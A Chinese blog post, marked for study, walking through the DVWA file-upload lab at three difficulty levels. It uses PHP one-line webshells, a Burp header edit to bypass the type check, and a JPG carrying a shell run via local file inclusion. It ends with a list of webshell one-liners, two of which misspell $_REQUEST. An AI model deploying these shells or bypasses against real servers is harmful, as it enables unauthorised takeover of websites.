OWASP-文件上传漏洞简述:
注:仅作学习使用
OWASP-文件上传漏洞(低级):
首先上传一个jgp图片,测试它上传成功的反应:
发现上传成功是这样的:
然后试试上传其他类型的文件,此处是一个html的文件,发现可以上传成功:
再试试上传一句话木马可不可以:
上传成功哈:
访问一下自己的文件(靶场不同于网站,其他网站得自己找路径):
虽然没看显示东西,但是东西就在这里哈:
虽然这上面啥都没有显示,但是我们拿上这个url就可以使用软件去连接网站后台目录了:
此处使用的是蚁剑:
添加数据:
此时就可以对网站为所欲为啦,拿下网站权限了:
OWASP-文件上传漏洞(中级):
首先上传一个jpg文件,查看上传成功发反应:
再试试其他类型能不能上传成功:
发现其他文件类型全都不可以,判定它只允许上传jpg类型的文件:
只能上传jpg类型的文件怎么办呢?
我们可以试试burp suite修改文件头部试试看:
发送后:
成功上传!
然后点开蚁剑来连接:
连接成功!
OWASP-文件上传漏洞(高级):
首先上传一个jpg文件,查看上传成功发反应:
再看看可不可以上传其他类型的文件:
发现不可以,观察网站发现此网站有文件包含:
可以试试用本地文件包含的方式来拿到此网站的权限:
我们在 .jpg文件中添加木马:
此处使用软件为edjpgcom,直接把图片拖到上面就可以加马了
输入要加的木马:
使用notepad++查看,发现图片中已经有了我们加的木马:
上传此图片:
复制 …/…/hackable/uploads/webshell.jpg 这个路径,使用文件包含漏洞调用执行这个jpg文件
点到这里:
将page=后面的值替换为我们上传的文件位置路径:
我们看一下虚拟机里面是否生成木马:
发现已经生成,点开蚁剑来连接:
测试连接成功,我们已经拿到此网站的权限。
(测试连接时返回数据为空一般是木马的问题,不是url地址填错)
(返回一堆红色字母的是url错误)
以上涉及到的一些知识:
webshell
木马分为大马和小马:
大马:代码量比小马多,通常会进行二次编码
小马:一句话木马,即整个代码量只有一行
常用小马:
request是在网页端进行输出访问
<?php eval($_REQUESIT['shell']);?>
//eval通常调用phpinfo()参数
<?php system($_REQUESIT['shell']);?>
//system通常使用Linux命令,例如ls等..
post是使用中国菜刀、蚁剑等工具去连接
<?php @eval($_POST['shell']);?>
<?php fputs(fopen("shell20.php","w"),'<?php eval($_POST[123]);?>')?> ;?>
//创建一个叫shell20.php文件内容为'<?php eval($_POST[123]);?>'的文件并保存
//fputs() 函数写入文件,fopen() 函数打开文件,"w"写入方式打开,文件不存在就建一个。
文件包含:
文件包含漏洞是因为没有限制好包含文件的范围产生的。
当文件包含的时候,不管这个文件是什么文件,它都会把这个文件当作php文件进行执行。
当服务器开启了文件包含功能后,就可以通过php某些特性函数(如 include() )来包含其他文件,此时如果没有对文件来源进行严格的审查,可能就会造成导致文件被任意读取、网站被恶意侵害等。
它分为:
本地文件包含(Local File Inclusion):本地文件包含较难,因为你要突破重重阻碍把文件上传到服务器上才可以开始包含。
远程文件包含(Remote File Inclusion):通过http协议包含到不是本服务器上的其他地方的资源
标签:文件,低中,包含,OWASP,漏洞,简述,木马,上传 来源: https://blog.csdn.net/qq_55803921/article/details/121145338
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。